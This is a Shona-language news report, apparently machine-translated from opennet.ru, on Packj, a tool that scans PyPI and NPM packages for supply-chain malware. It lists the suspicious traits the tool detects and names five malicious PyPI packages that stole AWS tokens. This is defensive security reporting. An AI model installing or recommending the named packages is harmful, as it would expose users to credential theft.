Vagadziri vePackj papuratifomu, inoongorora kuchengetedzeka kwemaraibhurari, vakaburitsa yakavhurika mutsara wetiturusi iyo inovatendera kuti vaone zvimiro zvine njodzi mumapakeji izvo zvingave zvine chekuita nekuitwa kwehutsinye kana kuvapo kwekusagadzikana kunoshandiswa kurwisa. pamapurojekiti achishandisa mapakeji ari mubvunzo ("supply chain"). Kuongorora kwepakeji kunotsigirwa mumitauro yePython neJavaScript, inobatwa muPyPi neNPM madhairekitori (ivo vanorongawo kuwedzera rutsigiro rweRuby neRubyGems mwedzi uno). Iyo kodhi yekushandisa yakanyorwa muPython uye yakagoverwa pasi peiyo AGPLv3 rezinesi.
Munguva yekuongororwa kwezviuru mazana matatu nemakumi matatu emapakeji vachishandisa maturusi akatsanangurwa muPyPi repository, makumi mana nemaviri mapakeji ane hutsinye ane backdoor uye zviuru zviviri nemazana mana emapakeji ane njodzi akaonekwa. Munguva yekuongorora, static kodhi yekuongorora inoitwa kuti uone maAPI maitiro uye kuongorora kuvepo kwekuzivikanwa kwekusagadzikana kwakacherechedzwa mudura reOSV. Iyo MalOSS package inoshandiswa kuongorora iyo API. Iyo kodhi yepakiti inoongororwa kuvepo kwemaitiro akajairika anowanzo shandiswa mune malware. Iwo matemplate akagadzirirwa zvichibva pakudzidza kwe330 mapaketi ane yakasimbiswa hutsinye chiitiko.
Inotaridzawo hunhu uye metadata inotungamira kune yakawedzera njodzi yekushandisa zvisizvo, sekuuraya zvivharo kuburikidza ne "eval" kana "exec", ichigadzira kodhi nyowani panguva yekumhanya, uchishandisa obfuscated kodhi nzira, manipulate nharaunda kusiyanisa, kusiri-chinangwa kuwana mafaera, kuwana zviwanikwa zvenetiweki muzvinyorwa zvekuisa (setup.py), uchishandisa typequatting (kupa mazita akafanana nemazita emaraibhurari anozivikanwa), kuzivisa mapurojekiti ekare uye akasiiwa, kutsanangura maemail asiripo uye mawebhusaiti, kushaikwa kweruzhinji repository ine kodhi.
Pamusoro pezvo, isu tinogona kucherechedza kuzivikanwa kwevamwe vaongorori vekuchengetedza emapakeji mashanu ane hutsinye muPyPi repository, iyo yakatumira zviri mukati memamiriro ekunze kune yekunze server netarisiro yekuba ma tokens eAWS uye anoenderera mberi ekubatanidza masisitimu: loglib-modules (yakaratidzwa se. modules yepamutemo loglib raibhurari), pyg-modules, pygrata uye pygrata-utils (yakaitwa sekuwedzera kune yepamutemo pyg library) uye hkg-sol-utils.
Source: opennet.ru